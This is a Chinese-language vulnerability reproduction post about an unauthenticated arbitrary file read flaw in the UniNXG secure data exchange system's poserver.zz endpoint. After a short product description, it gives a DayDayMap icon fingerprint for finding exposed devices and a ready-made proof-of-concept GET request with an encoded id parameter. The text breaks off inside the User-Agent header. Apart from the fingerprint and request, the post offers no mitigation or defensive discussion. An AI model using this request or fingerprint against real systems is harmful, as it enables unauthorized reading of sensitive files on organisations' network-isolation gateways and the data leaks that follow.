联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞复现

0x01 产品简介

联软安渡UniNXG安全数据交换系统，是联软科技自研的业内融合网闸、网盘和DLP的一体机产品，它同时支持多网交换，查杀毒、审计审批、敏感内容识别等功能，是解决用户网络隔离、网间及网内数据传输、交换、共享/分享、存储的理想安全设备，具有开创性意义。
UniNXG能很好保障多网隔离的安全效果，给内部传输操作提供了更可靠的方式，同时对内部文件传输安全态势进行分析展示，有效阻断文件传输过程中泄密的风险。

0x02 漏洞概述

联软安渡 UniNXG 安全数据交换系统 /UniExServices/poserver.zz 接口任意文件读取漏洞，未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件，造成数据泄露，导致系统处于极不安全的状态。

0x03 复现环境

DayDayMap：

web.icon="928831999d8de4c41d271319631ab01b"

0x04 漏洞复现

PoC

GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chr